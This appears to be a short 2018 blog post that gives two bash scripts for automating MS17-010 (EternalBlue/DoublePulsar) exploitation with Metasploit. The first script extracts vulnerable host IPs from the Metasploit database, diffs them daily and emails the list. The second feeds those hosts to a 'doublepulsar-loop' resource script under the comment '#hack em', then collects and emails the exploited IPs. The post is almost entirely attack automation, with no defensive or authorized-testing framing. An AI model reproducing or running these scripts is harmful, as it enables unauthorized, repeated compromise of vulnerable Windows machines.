Tuesday, October 30, 2018

automate ms010-17 exploitation better

 <find vuln hosts>  
 #!/bin/bash  
 VULNHOSTS=/root/doublepulsar.scan/VULNHOSTS  
 TIMESTAMP=$(date "+%Y%m%d")  
   
 cd /root/doublepulsar.scan/VULNHOSTS/  
   
 msfconsole -x "color false ; vulns -o /root/doublepulsar.scan/VULNHOSTS/vulns.msf ; exit"  
 sort -u $VULNHOSTS/vulns.msf > $VULNHOSTS/vulns.msf.o  
 grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $VULNHOSTS/vulns.msf.o > $VULNHOSTS/vulns.msf.ip  
 sort -u $VULNHOSTS/vulns.msf.ip > $VULNHOSTS/vulnerablehosts.$TIMESTAMP  
   
 for file in $(find . -mtime 1 ); do  
  sdiff $file vulnerablehosts.$TIMESTAMP | less | grep '>' > changes.$TIMESTAMP  
 done  
   
 mail -s "vulnerable hosts $TIMESTAMP" me@hell < vulnerablehosts.$TIMESTAMP  
 mail -s "vulnerable hosts difference $TIMESTAMP" me@hell < changes.$TIMESTAMP  
   
 #rm -rf $VULNHOSTS/vulns.*  
 #rm $VULNHOSTS/changes.$TIMESTAMP  
   
 <post report, exploit>  
   
 #!/bin/bash  
 PROCESS=/root/doublepulsar.scan/exploit  
 THEWICKED=/root/doublepulsar.scan/VULNHOSTS  
 TODAY=$(date '+%Y%m%d')  
 YESTERDAY=$(date -d "yesterday" '+%Y%m%d')  
 TOMORROW=$(date -d "next day" '+%Y%m%d')  
 WORK=/root/.msf4  
   
 cd $PROCESS/  
 mkdir $PROCESS/logs/$TODAY  
   
 cp $WORK/thewicked $WORK/thewicked.$TODAY  
 cp $THEWICKED/vulnerablehosts.$TODAY $WORK/thewicked  
   
 #hack em  
 cd /root/.msf4  
 msfconsole -x "color false ; jobs -K ; resource doublepulsar-loop.rc ; exit"  
   
 cd /root/.msf4/logs/sessions  
 ls | grep $TODAY | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > $PROCESS/exploited.$TODAY  
   
 mkdir /root/doublepulsar.scan/exploit/$TODAY  
 mv /root/.msf4/logs/sessions/*.log $PROCESS/$TODAY  
   
 mail -s "doublepulsar vuln hosts exploited $TODAY" me@hell < $PROCESS/exploited.$TODAY  
   
 exit